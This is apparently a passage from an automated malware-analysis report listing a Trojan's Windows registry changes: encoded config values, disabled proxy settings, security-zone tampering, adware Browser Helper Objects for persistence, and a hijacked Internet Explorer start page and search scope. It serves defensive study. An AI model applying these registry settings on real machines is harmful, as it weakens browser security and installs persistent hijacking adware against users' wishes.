"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Version" = "22022148"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"

"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svpath" = "c:\Program Files\TerminusKeeper\TerminusKeeper.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 9A 19 6B 14 21 9D F0 2C 4E 39 6F 44 CC 42 F8"

The process rundll32.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"
"0e93c3f3" = "///%"
"f6ad6fa6" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"
"a1dcff5b" = "V/////%%"
"6185d035" = "Vx/2/Cx/V//l////"
"c5705860" = "Vx////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"72758a5d" = "///%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"bbf88800" = "///%"
"0dc3ee96" = "/P////%%"
"fe94ce1e" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"
"c99a5f5c" = "///%"
"f1f24e29" = "Vl/l/C/////%"
"3c09c42b" = "///%"
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"0c230bcb" = "///%"
"a2e3b941" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"
"c6c5dd44" = "V/////%%"
"414bc593" = "///%"
"7f69fa1f" = "///%"
"65114b36" = "Vl/l////"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B D3 B0 25 F0 93 DA AB 73 E7 2D CE 9D BC 27 85"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"
"f2c53c49" = "UlAr/XJ/c//k////"
"e46c271e" = "///%"
"2e22d94e" = "///%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"
"f0bf0bde" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"587b5709" = "V/////%%"
"48bd1aff" = "V/////%%"

The process regsvr32.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 87 45 DC 73 D5 F7 A8 24 75 D3 12 8E C9 97 9B"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\VersionIndependentProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CurVer]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\ProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{1794EDF4-AB72-4097-9564-4E9260F483B4}" = "1"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\Programmable]
"(Default)" = ""

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_]
"(Default)" = "bestadblocker"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9]
"(Default)" = "bestadblocker"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"

"NoExplorer" = "1"

The process regsvr32.exe:1784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}]
"(Default)" = "IRuntime"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\Programmable]
"(Default)" = ""

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"Version" = "1.0"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CurVer]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}]
"(Default)" = "IRegistry"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{296EA12C-9126-48AA-AC11-7ECC0463D2B2}" = "1"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_]
"(Default)" = "CutThePrIcE"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\CutThePrIcE"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 9A 22 EF 01 B1 0F C1 82 2F BE 83 3A ED 10 D2"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\ProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\VersionIndependentProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}]
"(Default)" = "ILocalStorage"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9]
"(Default)" = "CutThePrIcE"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"

"NoExplorer" = "1"

The process hpds_setup.exe:164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
